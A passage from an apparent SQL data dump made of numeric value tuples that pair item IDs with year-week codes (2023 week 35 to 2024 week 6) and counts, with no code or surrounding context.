'202335',3),(3541,1,'202335',3),(3710,1,'202335',3),(3714,1,'202335',3),(3746,1,'202335',3),(3771,1,'202335',3),(4373,1,'202335',3),(4396,1,'202335',3),(4514,1,'202335',3),(4517,1,'202335',3),(4529,1,'202335',3),(4542,1,'202335',3),(4566,1,'202335',3),(4681,1,'202335',3),(4685,1,'202335',3),(4694,1,'202335',3),(4703,1,'202335',3),(4709,1,'202335',3),(4722,1,'202335',3),(4750,1,'202335',3),(4768,1,'202335',3),(4980,1,'202335',3),(5024,1,'202335',3),(5037,1,'202335',3),(5071,1,'202335',3),(5134,1,'202335',3),(5137,1,'202335',3),(5153,1,'202335',3),(5248,1,'202335',3),(102,1,'202335',4),(479,1,'202335',4),(570,1,'202335',4),(1590,1,'202335',4),(1707,1,'202335',4),(1718,1,'202335',4),(1730,1,'202335',4),(1745,1,'202335',4),(1751,1,'202335',4),(2063,1,'202335',4),(2165,1,'202335',4),(2801,1,'202335',4),(2993,1,'202335',4),(3005,1,'202335',4),(3006,1,'202335',4),(3038,1,'202335',4),(3079,1,'202335',4),(3127,1,'202335',4),(3243,1,'202335',4),(3257,1,'202335',4),(3282,1,'202335',4),(3285,1,'202335',4),(3287,1,'202335',4),(3316,1,'202335',4),(3438,1,'202335',4),(3489,1,'202335',4),(3498,1,'202335',4),(3531,1,'202335',4),(3534,1,'202335',4),(3724,1,'202335',4),(3731,1,'202335',4),(3735,1,'202335',4),(4275,1,'202335',4),(4301,1,'202335',4),(4323,1,'202335',4),(4326,1,'202335',4),(4329,1,'202335',4),(4335,1,'202335',4),(4382,1,'202335',4),(4408,1,'202335',4),(4432,1,'202335',4),(4454,1,'202335',4),(4551,1,'202335',4),(4663,1,'202335',4),(4741,1,'202335',4),(4888,1,'202335',4),(4976,1,'202335',4),(5157,1,'202335',4),(5253,1,'202335',4),(5264,1,'202335',4),(5271,1,'202335',4),(5363,1,'202335',4),(469,1,'202335',5),(472,1,'202335',5),(478,1,'202335',5),(1598,1,'202335',5),(1695,1,'202335',5),(1701,1,'202335',5),(1703,1,'202335',5),(1724,1,'202335',5),(1741,1,'202335',5),(1768,1,'202335',5),(2148,1,'202335',5),(2152,1,'202335',5),(2154,1,'202335',5),(2161,1,'202335',5),(2297,1,'202335',5),(2609,1,'202335',5),(2751,1,'202335',5),(2956,1,'202335',5),(2964,1,'202335',5),(2989,1,'202335',5),(3027,1,'202335',5),(3041,1,'202335',5),(3072,1,'202335',5),(3083,1,'202335',5),(3249,1,'202335',5),(3727,1,'202335',5),(3738,1,'202335',5),(3742,1,'202335',5),(3749,1,'202335',5),(3752,1,'202335',5),(4338,1,'202335',5),(4341,1,'202335',5),(4368,1,'202335',5),(4377,1,'202335',5),(4400,1,'202335',5),(4404,1,'202335',5),(4440,1,'202335',5),(4524,1,'202335',5),(4691,1,'202335',5),(4697,1,'202335',5),(4771,1,'202335',5),(5046,1,'202335',5),(5067,1,'202335',5),(5101,1,'202335',5),(5140,1,'202335',5),(5259,1,'202335',5),(5268,1,'202335',5),(5292,1,'202335',5),(5295,1,'202335',5),(5301,1,'202335',5),(5304,1,'202335',5),(5310,1,'202335',5),(5314,1,'202335',5),(5320,1,'202335',5),(74,1,'202335',6),(474,1,'202335',6),(481,1,'202335',6),(482,1,'202335',6),(484,1,'202335',6),(486,1,'202335',6),(488,1,'202335',6),(1734,1,'202335',6),(2293,1,'202335',6),(3023,1,'202335',6),(3087,1,'202335',6),(3092,1,'202335',6),(3124,1,'202335',6),(3240,1,'202335',6),(3253,1,'202335',6),(3271,1,'202335',6),(3273,1,'202335',6),(3721,1,'202335',6),(4387,1,'202335',6),(4391,1,'202335',6),(4424,1,'202335',6),(4448,1,'202335',6),(4582,1,'202335',6),(4645,1,'202335',6),(4648,1,'202335',6),(4677,1,'202335',6),(4688,1,'202335',6),(4706,1,'202335',6),(4988,1,'202335',6),(4996,1,'202335',6),(5033,1,'202335',6),(5062,1,'202335',6),(5076,1,'202335',6),(5125,1,'202335',6),(5256,1,'202335',6),(5280,1,'202335',6),(5298,1,'202335',6),(5307,1,'202335',6),(5317,1,'202335',6),(5323,1,'202335',6),(5334,1,'202335',6),(1774,1,'202335',7),(2813,1,'202335',7),(3066,1,'202335',7),(3307,1,'202335',7),(4332,1,'202335',7),(4357,1,'202335',7),(4420,1,'202335',7),(4428,1,'202335',7),(4436,1,'202335',7),(4608,1,'202335',7),(4660,1,'202335',7),(4700,1,'202335',7),(4759,1,'202335',7),(4776,1,'202335',7),(5326,1,'202335',7),(477,1,'202335',8),(1614,1,'202335',8),(1722,1,'202335',8),(2178,1,'202335',8),(2658,1,'202335',8),(2775,1,'202335',8),(2911,1,'202335',8),(3090,1,'202335',8),(3247,1,'202335',8),(4416,1,'202335',8),(4444,1,'202335',8),(5042,1,'202335',8),(5050,1,'202335',8),(5080,1,'202335',8),(5146,1,'202335',8),(87,1,'202335',9),(1770,1,'202335',9),(2457,1,'202335',9),(2769,1,'202335',9),(3069,1,'202335',9),(3102,1,'202335',9),(4363,1,'202335',9),(4520,1,'202335',9),(4612,1,'202335',9),(4657,1,'202335',9),(467,1,'202335',10),(485,1,'202335',10),(1606,1,'202335',10),(1711,1,'202335',10),(2159,1,'202335',10),(2965,1,'202335',10),(3251,1,'202335',10),(4674,1,'202335',10),(4744,1,'202335',10),(5054,1,'202335',10),(5131,1,'202335',10),(5289,1,'202335',10),(108,1,'202335',11),(470,1,'202335',11),(2309,1,'202335',11),(3004,1,'202335',11),(3034,1,'202335',11),(468,1,'202335',12),(1728,1,'202335',12),(2296,1,'202335',12),(3030,1,'202335',12),(1594,1,'202335',13),(1602,1,'202335',13),(1766,1,'202335',13),(2503,1,'202335',13),(4238,1,'202335',13),(4930,1,'202335',13),(5122,1,'202335',13),(1604,1,'202335',14),(3060,1,'202335',14),(4412,1,'202335',14),(5356,1,'202335',14),(84,1,'202335',15),(335,1,'202335',15),(2809,1,'202335',15),(4457,1,'202335',15),(4977,1,'202335',16),(5276,1,'202335',16),(5359,1,'202335',16),(1596,1,'202335',17),(1610,1,'202335',17),(2704,1,'202335',17),(5163,1,'202335',17),(5353,1,'202335',17),(1544,1,'202335',18),(1592,1,'202335',18),(1612,1,'202335',18),(3764,1,'202335',18),(1588,1,'202335',19),(3781,1,'202335',20),(1582,1,'202335',21),(1586,1,'202335',21),(1608,1,'202335',21),(76,1,'202335',22),(91,1,'202335',22),(1600,1,'202335',22),(2904,1,'202335',22),(89,1,'202335',23),(487,1,'202335',26),(72,1,'202335',31),(68,1,'202335',41),(473,1,'202335',43),(80,1,'202335',113),(9,1,'202335',747),(2154,1,'202336',1),(5028,1,'202336',1),(1701,1,'202336',2),(1705,1,'202336',2),(1715,1,'202336',2),(1726,1,'202336',2),(1747,1,'202336',2),(1778,1,'202336',2),(2063,1,'202336',2),(2813,1,'202336',2),(3072,1,'202336',2),(3087,1,'202336',2),(3092,1,'202336',2),(3243,1,'202336',2),(3269,1,'202336',2),(3280,1,'202336',2),(3282,1,'202336',2),(3721,1,'202336',2),(3724,1,'202336',2),(3752,1,'202336',2),(4357,1,'202336',2),(4546,1,'202336',2),(4591,1,'202336',2),(4651,1,'202336',2),(4883,1,'202336',2),(106,1,'202336',3),(110,1,'202336',3),(478,1,'202336',3),(1707,1,'202336',3),(1709,1,'202336',3),(1713,1,'202336',3),(1720,1,'202336',3),(1734,1,'202336',3),(1737,1,'202336',3),(1741,1,'202336',3),(1768,1,'202336',3),(2248,1,'202336',3),(2558,1,'202336',3),(2989,1,'202336',3),(2993,1,'202336',3),(3023,1,'202336',3),(3027,1,'202336',3),(3079,1,'202336',3),(3109,1,'202336',3),(3117,1,'202336',3),(3229,1,'202336',3),(3249,1,'202336',3),(3257,1,'202336',3),(3259,1,'202336',3),(3285,1,'202336',3),(3307,1,'202336',3),(3316,1,'202336',3),(3430,1,'202336',3),(3438,1,'202336',3),(3479,1,'202336',3),(3531,1,'202336',3),(3541,1,'202336',3),(3749,1,'202336',3),(3771,1,'202336',3),(4341,1,'202336',3),(4368,1,'202336',3),(4387,1,'202336',3),(4542,1,'202336',3),(4648,1,'202336',3),(4744,1,'202336',3),(4858,1,'202336',3),(5046,1,'202336',3),(5071,1,'202336',3),(5140,1,'202336',3),(5153,1,'202336',3),(5157,1,'202336',3),(477,1,'202336',4),(483,1,'202336',4),(1697,1,'202336',4),(1699,1,'202336',4),(1732,1,'202336',4),(1739,1,'202336',4),(1743,1,'202336',4),(1749,1,'202336',4),(1772,1,'202336',4),(2150,1,'202336',4),(2156,1,'202336',4),(2165,1,'202336',4),(2252,1,'202336',4),(2297,1,'202336',4),(2658,1,'202336',4),(2751,1,'202336',4),(2965,1,'202336',4),(3004,1,'202336',4),(3005,1,'202336',4),(3034,1,'202336',4),(3063,1,'202336',4),(3069,1,'202336',4),(3096,1,'202336',4),(3097,1,'202336',4),(3104,1,'202336',4),(3240,1,'202336',4),(3245,1,'202336',4),(3253,1,'202336',4),(3261,1,'202336',4),(3265,1,'202336',4),(3267,1,'202336',4),(3297,1,'202336',4),(3313,1,'202336',4),(3486,1,'202336',4),(3727,1,'202336',4),(3738,1,'202336',4),(3777,1,'202336',4),(4275,1,'202336',4),(4326,1,'202336',4),(4332,1,'202336',4),(4377,1,'202336',4),(4382,1,'202336',4),(4408,1,'202336',4),(4428,1,'202336',4),(4448,1,'202336',4),(4691,1,'202336',4),(4741,1,'202336',4),(4756,1,'202336',4),(4762,1,'202336',4),(4765,1,'202336',4),(4771,1,'202336',4),(4792,1,'202336',4),(4797,1,'202336',4),(4862,1,'202336',4),(4866,1,'202336',4),(5020,1,'202336',4),(5067,1,'202336',4),(5271,1,'202336',4),(476,1,'202336',5),(479,1,'202336',5),(481,1,'202336',5),(484,1,'202336',5),(1584,1,'202336',5),(1590,1,'202336',5),(1695,1,'202336',5),(1724,1,'202336',5),(1730,1,'202336',5),(1751,1,'202336',5),(1780,1,'202336',5),(1782,1,'202336',5),(2148,1,'202336',5),(2161,1,'202336',5),(2293,1,'202336',5),(2617,1,'202336',5),(2964,1,'202336',5),(2991,1,'202336',5),(3038,1,'202336',5),(3124,1,'202336',5),(3127,1,'202336',5),(3271,1,'202336',5),(3275,1,'202336',5),(3278,1,'202336',5),(3290,1,'202336',5),(3731,1,'202336',5),(3735,1,'202336',5),(3742,1,'202336',5),(4329,1,'202336',5),(4400,1,'202336',5),(4416,1,'202336',5),(4424,1,'202336',5),(4440,1,'202336',5),(4454,1,'202336',5),(4514,1,'202336',5),(4582,1,'202336',5),(4657,1,'202336',5),(4663,1,'202336',5),(4706,1,'202336',5),(4753,1,'202336',5),(4802,1,'202336',5),(4878,1,'202336',5),(4888,1,'202336',5),(4897,1,'202336',5),(4976,1,'202336',5),(4988,1,'202336',5),(5058,1,'202336',5),(5125,1,'202336',5),(5134,1,'202336',5),(5317,1,'202336',5),(5363,1,'202336',5),(482,1,'202336',6),(488,1,'202336',6),(1703,1,'202336',6),(1718,1,'202336',6),(1722,1,'202336',6),(1776,1,'202336',6),(2159,1,'202336',6),(2178,1,'202336',6),(2748,1,'202336',6),(2801,1,'202336',6),(2804,1,'202336',6),(2956,1,'202336',6),(3226,1,'202336',6),(3247,1,'202336',6),(3273,1,'202336',6),(3482,1,'202336',6),(3489,1,'202336',6),(3714,1,'202336',6),(3774,1,'202336',6),(4238,1,'202336',6),(4301,1,'202336',6),(4373,1,'202336',6),(4404,1,'202336',6),(4432,1,'202336',6),(4444,1,'202336',6),(4551,1,'202336',6),(4587,1,'202336',6),(4654,1,'202336',6),(4660,1,'202336',6),(4712,1,'202336',6),(4750,1,'202336',6),(4759,1,'202336',6),(4870,1,'202336',6),(4874,1,'202336',6),(4893,1,'202336',6),(4980,1,'202336',6),(4983,1,'202336',6),(4996,1,'202336',6),(5024,1,'202336',6),(5062,1,'202336',6),(5330,1,'202336',6),(467,1,'202336',7),(471,1,'202336',7),(472,1,'202336',7),(486,1,'202336',7),(570,1,'202336',7),(1602,1,'202336',7),(1745,1,'202336',7),(3006,1,'202336',7),(3030,1,'202336',7),(3045,1,'202336',7),(3083,1,'202336',7),(3102,1,'202336',7),(3287,1,'202336',7),(3498,1,'202336',7),(4323,1,'202336',7),(4335,1,'202336',7),(4396,1,'202336',7),(4436,1,'202336',7),(4517,1,'202336',7),(4556,1,'202336',7),(4566,1,'202336',7),(4612,1,'202336',7),(4668,1,'202336',7),(4688,1,'202336',7),(5037,1,'202336',7),(5042,1,'202336',7),(5050,1,'202336',7),(5054,1,'202336',7),(5080,1,'202336',7),(5137,1,'202336',7),(5146,1,'202336',7),(5248,1,'202336',7),(5264,1,'202336',7),(5326,1,'202336',7),(480,1,'202336',8),(1588,1,'202336',8),(1614,1,'202336',8),(1711,1,'202336',8),(2152,1,'202336',8),(2769,1,'202336',8),(2911,1,'202336',8),(3041,1,'202336',8),(3060,1,'202336',8),(3107,1,'202336',8),(3534,1,'202336',8),(3746,1,'202336',8),(4420,1,'202336',8),(4697,1,'202336',8),(4700,1,'202336',8),(4722,1,'202336',8),(4768,1,'202336',8),(4776,1,'202336',8),(5128,1,'202336',8),(5268,1,'202336',8),(5276,1,'202336',8),(5323,1,'202336',8),(102,1,'202336',9),(1728,1,'202336',9),(2296,1,'202336',9),(2309,1,'202336',9),(2775,1,'202336',9),(3263,1,'202336',9),(3710,1,'202336',9),(4338,1,'202336',9),(4363,1,'202336',9),(4412,1,'202336',9),(4608,1,'202336',9),(4645,1,'202336',9),(4681,1,'202336',9),(4747,1,'202336',9),(5101,1,'202336',9),(5298,1,'202336',9),(5310,1,'202336',9),(5353,1,'202336',9),(5356,1,'202336',9),(5359,1,'202336',9),(468,1,'202336',10),(485,1,'202336',10),(1610,1,'202336',10),(1766,1,'202336',10),(1774,1,'202336',10),(3251,1,'202336',10),(4391,1,'202336',10),(4677,1,'202336',10),(4703,1,'202336',10),(5076,1,'202336',10),(5253,1,'202336',10),(5256,1,'202336',10),(5289,1,'202336',10),(5295,1,'202336',10),(5301,1,'202336',10),(74,1,'202336',11),(469,1,'202336',11),(1600,1,'202336',11),(2809,1,'202336',11),(3781,1,'202336',11),(4457,1,'202336',11),(4685,1,'202336',11),(4694,1,'202336',11),(5033,1,'202336',11),(5280,1,'202336',11),(5314,1,'202336',11),(87,1,'202336',12),(108,1,'202336',12),(2609,1,'202336',12),(3090,1,'202336',12),(3764,1,'202336',12),(4524,1,'202336',12),(4529,1,'202336',12),(4977,1,'202336',12),(335,1,'202336',13),(470,1,'202336',13),(1598,1,'202336',13),(1770,1,'202336',13),(3066,1,'202336',13),(5122,1,'202336',13),(5259,1,'202336',13),(5292,1,'202336',13),(5320,1,'202336',13),(84,1,'202336',14),(1544,1,'202336',14),(1608,1,'202336',14),(4674,1,'202336',14),(5334,1,'202336',14),(1582,1,'202336',15),(1594,1,'202336',15),(1604,1,'202336',15),(1612,1,'202336',15),(2704,1,'202336',15),(4709,1,'202336',15),(5304,1,'202336',15),(5307,1,'202336',15),(1592,1,'202336',16),(2457,1,'202336',16),(4520,1,'202336',16),(76,1,'202336',17),(2503,1,'202336',17),(1606,1,'202336',18),(91,1,'202336',19),(474,1,'202336',19),(487,1,'202336',19),(1586,1,'202336',19),(4930,1,'202336',19),(1596,1,'202336',20),(473,1,'202336',21),(5131,1,'202336',21),(5163,1,'202336',29),(68,1,'202336',30),(89,1,'202336',31),(72,1,'202336',32),(2904,1,'202336',50),(80,1,'202336',115),(9,1,'202336',742),(1747,1,'202337',1),(2150,1,'202337',1),(3275,1,'202337',1),(4275,1,'202337',1),(4408,1,'202337',1),(4428,1,'202337',1),(4996,1,'202337',1),(106,1,'202337',2),(110,1,'202337',2),(476,1,'202337',2),(479,1,'202337',2),(1697,1,'202337',2),(1776,1,'202337',2),(1780,1,'202337',2),(3041,1,'202337',2),(3249,1,'202337',2),(3265,1,'202337',2),(3541,1,'202337',2),(4387,1,'202337',2),(4762,1,'202337',2),(4792,1,'202337',2),(4797,1,'202337',2),(4874,1,'202337',2),(5271,1,'202337',2),(1590,1,'202337',3),(1699,1,'202337',3),(1703,1,'202337',3),(1720,1,'202337',3),(1730,1,'202337',3),(2161,1,'202337',3),(2178,1,'202337',3),(2964,1,'202337',3),(2991,1,'202337',3),(3127,1,'202337',3),(3226,1,'202337',3),(3253,1,'202337',3),(3257,1,'202337',3),(3267,1,'202337',3),(3316,1,'202337',3),(3482,1,'202337',3),(3714,1,'202337',3),(3774,1,'202337',3),(4326,1,'202337',3),(4357,1,'202337',3),(4382,1,'202337',3),(4424,1,'202337',3),(4432,1,'202337',3),(4542,1,'202337',3),(4648,1,'202337',3),(4651,1,'202337',3),(4663,1,'202337',3),(4722,1,'202337',3),(4750,1,'202337',3),(4771,1,'202337',3),(4862,1,'202337',3),(5020,1,'202337',3),(5153,1,'202337',3),(478,1,'202337',4),(482,1,'202337',4),(1584,1,'202337',4),(1701,1,'202337',4),(1732,1,'202337',4),(1741,1,'202337',4),(1743,1,'202337',4),(1749,1,'202337',4),(1774,1,'202337',4),(1778,1,'202337',4),(1782,1,'202337',4),(2165,1,'202337',4),(2248,1,'202337',4),(2252,1,'202337',4),(2293,1,'202337',4),(3023,1,'202337',4),(3027,1,'202337',4),(3096,1,'202337',4),(3229,1,'202337',4),(3240,1,'202337',4),(3243,1,'202337',4),(3245,1,'202337',4),(3261,1,'202337',4),(3278,1,'202337',4),(3280,1,'202337',4),(3282,1,'202337',4),(3290,1,'202337',4),(3297,1,'202337',4),(3307,1,'202337',4),(3498,1,'202337',4),(3531,1,'202337',4),(3727,1,'202337',4),(3735,1,'202337',4),(3742,1,'202337',4),(3746,1,'202337',4),(3749,1,'202337',4),(4323,1,'202337',4),(4329,1,'202337',4),(4368,1,'202337',4),(4377,1,'202337',4),(4396,1,'202337',4),(4420,1,'202337',4),(4546,1,'202337',4),(4556,1,'202337',4),(4612,1,'202337',4),(4654,1,'202337',4),(4657,1,'202337',4),(4660,1,'202337',4),(4668,1,'202337',4),(4741,1,'202337',4),(4756,1,'202337',4),(4802,1,'202337',4),(4883,1,'202337',4),(5037,1,'202337',4),(5323,1,'202337',4),(477,1,'202337',5),(1695,1,'202337',5),(1709,1,'202337',5),(1715,1,'202337',5),(1718,1,'202337',5),(1726,1,'202337',5),(1739,1,'202337',5),(1745,1,'202337',5),(1768,1,'202337',5),(2063,1,'202337',5),(2148,1,'202337',5),(2297,1,'202337',5),(2558,1,'202337',5),(2911,1,'202337',5),(2993,1,'202337',5),(3005,1,'202337',5),(3034,1,'202337',5),(3087,1,'202337',5),(3097,1,'202337',5),(3124,1,'202337',5),(3269,1,'202337',5),(3271,1,'202337',5),(3285,1,'202337',5),(3313,1,'202337',5),(3438,1,'202337',5),(3479,1,'202337',5),(3534,1,'202337',5),(3721,1,'202337',5),(3724,1,'202337',5),(3738,1,'202337',5),(3771,1,'202337',5),(3777,1,'202337',5),(4373,1,'202337',5),(4400,1,'202337',5),(4436,1,'202337',5),(4440,1,'202337',5),(4448,1,'202337',5),(4514,1,'202337',5),(4566,1,'202337',5),(4591,1,'202337',5),(4674,1,'202337',5),(4681,1,'202337',5),(4685,1,'202337',5),(4688,1,'202337',5),(4694,1,'202337',5),(4712,1,'202337',5),(4744,1,'202337',5),(4858,1,'202337',5),(4870,1,'202337',5),(4878,1,'202337',5),(4888,1,'202337',5),(5046,1,'202337',5),(5157,1,'202337',5),(5259,1,'202337',5),(5268,1,'202337',5),(5289,1,'202337',5),(5295,1,'202337',5),(5363,1,'202337',5),(102,1,'202337',6),(467,1,'202337',6),(483,1,'202337',6),(485,1,'202337',6),(486,1,'202337',6),(488,1,'202337',6),(1707,1,'202337',6),(1713,1,'202337',6),(1734,1,'202337',6),(1737,1,'202337',6),(2156,1,'202337',6),(2617,1,'202337',6),(2769,1,'202337',6),(2801,1,'202337',6),(2956,1,'202337',6),(3006,1,'202337',6),(3045,1,'202337',6),(3072,1,'202337',6),(3102,1,'202337',6),(3104,1,'202337',6),(3107,1,'202337',6),(3247,1,'202337',6),(3259,1,'202337',6),(3430,1,'202337',6),(3486,1,'202337',6),(3489,1,'202337',6),(3710,1,'202337',6),(4301,1,'202337',6),(4341,1,'202337',6),(4416,1,'202337',6),(4454,1,'202337',6),(4703,1,'202337',6),(4747,1,'202337',6),(4759,1,'202337',6),(5137,1,'202337',6),(5248,1,'202337',6),(5330,1,'202337',6),(480,1,'202337',7),(481,1,'202337',7),(1722,1,'202337',7),(1724,1,'202337',7),(1751,1,'202337',7),(1772,1,'202337',7),(2309,1,'202337',7),(2609,1,'202337',7),(2658,1,'202337',7),(2804,1,'202337',7),(2965,1,'202337',7),(2989,1,'202337',7),(3038,1,'202337',7),(3109,1,'202337',7),(3117,1,'202337',7),(3273,1,'202337',7),(3731,1,'202337',7),(3752,1,'202337',7),(4332,1,'202337',7),(4691,1,'202337',7),(4697,1,'202337',7),(4706,1,'202337',7),(4709,1,'202337',7),(4765,1,'202337',7),(4897,1,'202337',7),(4976,1,'202337',7),(5028,1,'202337',7),(5042,1,'202337',7),(5076,1,'202337',7),(5276,1,'202337',7),(5292,1,'202337',7),(5301,1,'202337',7),(5304,1,'202337',7),(5317,1,'202337',7),(5320,1,'202337',7),(471,1,'202337',8),(1614,1,'202337',8),(1705,1,'202337',8),(1711,1,'202337',8),(2152,1,'202337',8),(2154,1,'202337',8),(2748,1,'202337',8),(2751,1,'202337',8),(2775,1,'202337',8),(3063,1,'202337',8),(3079,1,'202337',8),(3083,1,'202337',8),(3287,1,'202337',8),(4335,1,'202337',8),(4363,1,'202337',8),(4391,1,'202337',8),(4529,1,'202337',8),(4677,1,'202337',8),(4866,1,'202337',8),(4983,1,'202337',8),(5050,1,'202337',8),(5067,1,'202337',8),(5101,1,'202337',8),(5125,1,'202337',8),(5146,1,'202337',8),(5264,1,'202337',8),(5383,1,'202337',8),(469,1,'202337',9),(1610,1,'202337',9),(1728,1,'202337',9),(1766,1,'202337',9),(2296,1,'202337',9),(2457,1,'202337',9),(2813,1,'202337',9),(3069,1,'202337',9),(4404,1,'202337',9),(4517,1,'202337',9),(4551,1,'202337',9),(4700,1,'202337',9),(4753,1,'202337',9),(4776,1,'202337',9),(4893,1,'202337',9),(5024,1,'202337',9),(5033,1,'202337',9),(5054,1,'202337',9),(5080,1,'202337',9),(5134,1,'202337',9),(5378,1,'202337',9),(74,1,'202337',10),(472,1,'202337',10),(1598,1,'202337',10),(2809,1,'202337',10),(3066,1,'202337',10),(3251,1,'202337',10),(3764,1,'202337',10),(4524,1,'202337',10),(4768,1,'202337',10),(5062,1,'202337',10),(5071,1,'202337',10),(5128,1,'202337',10),(5140,1,'202337',10),(5307,1,'202337',10),(5310,1,'202337',10),(5314,1,'202337',10),(484,1,'202337',11),(1592,1,'202337',11),(1596,1,'202337',11),(1602,1,'202337',11),(1606,1,'202337',11),(3263,1,'202337',11),(4238,1,'202337',11),(4587,1,'202337',11),(4977,1,'202337',11),(4988,1,'202337',11),(5058,1,'202337',11),(5256,1,'202337',11),(5298,1,'202337',11),(5326,1,'202337',11),(5356,1,'202337',11),(570,1,'202337',12),(3004,1,'202337',12),(3030,1,'202337',12),(3060,1,'202337',12),(4338,1,'202337',12),(4412,1,'202337',12),(4645,1,'202337',12),(4980,1,'202337',12),(5122,1,'202337',12),(5253,1,'202337',12),(5353,1,'202337',12),(474,1,'202337',13),(1770,1,'202337',13),(2159,1,'202337',13),(3090,1,'202337',13),(4608,1,'202337',13),(5374,1,'202337',13),(84,1,'202337',14),(3781,1,'202337',14),(4520,1,'202337',14),(4930,1,'202337',14),(487,1,'202337',15),(1604,1,'202337',15),(3092,1,'202337',15),(4457,1,'202337',15),(108,1,'202337',16),(1608,1,'202337',17),(5131,1,'202337',17),(5280,1,'202337',17),(5359,1,'202337',17),(87,1,'202337',18),(468,1,'202337',18),(1544,1,'202337',18),(1588,1,'202337',18),(2503,1,'202337',18),(2704,1,'202337',18),(5334,1,'202337',18),(470,1,'202337',19),(1586,1,'202337',19),(1594,1,'202337',19),(76,1,'202337',20),(1600,1,'202337',20),(1582,1,'202337',21),(1612,1,'202337',21),(5163,1,'202337',21),(335,1,'202337',22),(473,1,'202337',23),(72,1,'202337',33),(89,1,'202337',34),(91,1,'202337',36),(2904,1,'202337',39),(68,1,'202337',40),(80,1,'202337',121),(9,1,'202337',709),(68,1,'202338',1),(74,1,'202338',1),(87,1,'202338',1),(106,1,'202338',1),(472,1,'202338',1),(474,1,'202338',1),(477,1,'202338',1),(478,1,'202338',1),(480,1,'202338',1),(484,1,'202338',1),(487,1,'202338',1),(488,1,'202338',1),(570,1,'202338',1),(1582,1,'202338',1),(1584,1,'202338',1),(1610,1,'202338',1),(1703,1,'202338',1),(1713,1,'202338',1),(1718,1,'202338',1),(1722,1,'202338',1),(1745,1,'202338',1),(1747,1,'202338',1),(1768,1,'202338',1),(1774,1,'202338',1),(1778,1,'202338',1),(2148,1,'202338',1),(2150,1,'202338',1),(2152,1,'202338',1),(2154,1,'202338',1),(2156,1,'202338',1),(2297,1,'202338',1),(2503,1,'202338',1),(2609,1,'202338',1),(2704,1,'202338',1),(2809,1,'202338',1),(2993,1,'202338',1),(3005,1,'202338',1),(3023,1,'202338',1),(3034,1,'202338',1),(3045,1,'202338',1),(3063,1,'202338',1),(3072,1,'202338',1),(3079,1,'202338',1),(3102,1,'202338',1),(3226,1,'202338',1),(3243,1,'202338',1),(3251,1,'202338',1),(3259,1,'202338',1),(3271,1,'202338',1),(3280,1,'202338',1),(3287,1,'202338',1),(3316,1,'202338',1),(3479,1,'202338',1),(3531,1,'202338',1),(3710,1,'202338',1),(3764,1,'202338',1),(4238,1,'202338',1),(4335,1,'202338',1),(4363,1,'202338',1),(4387,1,'202338',1),(4400,1,'202338',1),(4457,1,'202338',1),(4520,1,'202338',1),(4587,1,'202338',1),(4645,1,'202338',1),(4651,1,'202338',1),(4677,1,'202338',1),(4700,1,'202338',1),(4765,1,'202338',1),(4862,1,'202338',1),(4976,1,'202338',1),(4988,1,'202338',1),(5033,1,'202338',1),(5050,1,'202338',1),(5101,1,'202338',1),(5128,1,'202338',1),(5134,1,'202338',1),(5253,1,'202338',1),(5264,1,'202338',1),(5271,1,'202338',1),(5334,1,'202338',1),(5353,1,'202338',1),(5359,1,'202338',1),(5374,1,'202338',1),(72,1,'202338',2),(84,1,'202338',2),(108,1,'202338',2),(335,1,'202338',2),(468,1,'202338',2),(473,1,'202338',2),(1588,1,'202338',2),(1592,1,'202338',2),(1602,1,'202338',2),(1604,1,'202338',2),(1608,1,'202338',2),(2309,1,'202338',2),(2964,1,'202338',2),(3030,1,'202338',2),(4338,1,'202338',2),(4608,1,'202338',2),(4753,1,'202338',2),(4768,1,'202338',2),(4930,1,'202338',2),(4983,1,'202338',2),(5131,1,'202338',2),(5307,1,'202338',2),(5314,1,'202338',2),(5356,1,'202338',2),(76,1,'202338',3),(89,1,'202338',3),(91,1,'202338',3),(470,1,'202338',3),(1544,1,'202338',3),(1600,1,'202338',3),(3069,1,'202338',3),(4703,1,'202338',3),(4977,1,'202338',3),(2989,1,'202338',4),(1586,1,'202338',5),(2904,1,'202338',5),(80,1,'202338',9),(9,1,'202338',47),(106,1,'202406',1),(110,1,'202406',1),(2293,1,'202406',3),(5153,1,'202406',3),(481,1,'202406',4),(1695,1,'202406',4),(1703,1,'202406',4),(1709,1,'202406',4),(1718,1,'202406',4),(1732,1,'202406',4),(1745,1,'202406',4),(1747,1,'202406',4),(1772,1,'202406',4),(2159,1,'202406',4),(2248,1,'202406',4),(2704,1,'202406',4),(2748,1,'202406',4),(2751,1,'202406',4),(2769,1,'202406',4),(2965,1,'202406',4),(2991,1,'202406',4),(2993,1,'202406',4),(3079,1,'202406',4),(3097,1,'202406',4),(3107,1,'202406',4),(3109,1,'202406',4),(3249,1,'202406',4),(3251,1,'202406',4),(3253,1,'202406',4),(3257,1,'202406',4),(3261,1,'202406',4),(3265,1,'202406',4),(3269,1,'202406',4),(3278,1,'202406',4),(3280,1,'202406',4),(4363,1,'202406',4),(4432,1,'202406',4),(4556,1,'202406',4),(4587,1,'202406',4),(4608,1,'202406',4),(4651,1,'202406',4),(4870,1,'202406',4),(4874,1,'202406',4),(4878,1,'202406',4),(4883,1,'202406',4),(4893,1,'202406',4),(5020,1,'202406',4),(5033,1,'202406',4),(5037,1,'202406',4),(5042,1,'202406',4),(5046,1,'202406',4),(5062,1,'202406',4),(5080,1,'202406',4),(5122,1,'202406',4),(5146,1,'202406',4),(5157,1,'202406',4),(5264,1,'202406',4),(5326,1,'202406',4),(5378,1,'202406',4),(5383,1,'202406',4),(477,1,'202406',5),(478,1,'202406',5),(480,1,'202406',5),(482,1,'202406',5),(483,1,'202406',5),(484,1,'202406',5),(488,1,'202406',5),(1544,1,'202406',5),(1584,1,'202406',5),(1590,1,'202406',5),(1594,1,'202406',5),(1608,1,'202406',5),(1697,1,'202406',5),(1705,1,'202406',5),(1711,1,'202406',5),(1715,1,'202406',5),(1726,1,'202406',5),(1728,1,'202406',5),(1730,1,'202406',5),(1739,1,'202406',5),(1743,1,'202406',5),(1774,1,'202406',5),(1776,1,'202406',5),(1782,1,'202406',5),(2063,1,'202406',5),(2150,1,'202406',5),(2152,1,'202406',5),(2161,1,'202406',5),(2165,1,'202406',5),(2252,1,'202406',5),(2296,1,'202406',5),(2558,1,'202406',5),(2609,1,'202406',5),(2617,1,'202406',5),(2775,1,'202406',5),(2964,1,'202406',5),(2989,1,'202406',5),(3005,1,'202406',5),(3072,1,'202406',5),(3087,1,'202406',5),(3096,1,'202406',5),(3127,1,'202406',5),(3229,1,'202406',5),(3240,1,'202406',5),(3243,1,'202406',5),(3245,1,'202406',5),(3263,1,'202406',5),(3267,1,'202406',5),(3275,1,'202406',5),(3287,1,'202406',5),(3290,1,'202406',5),(33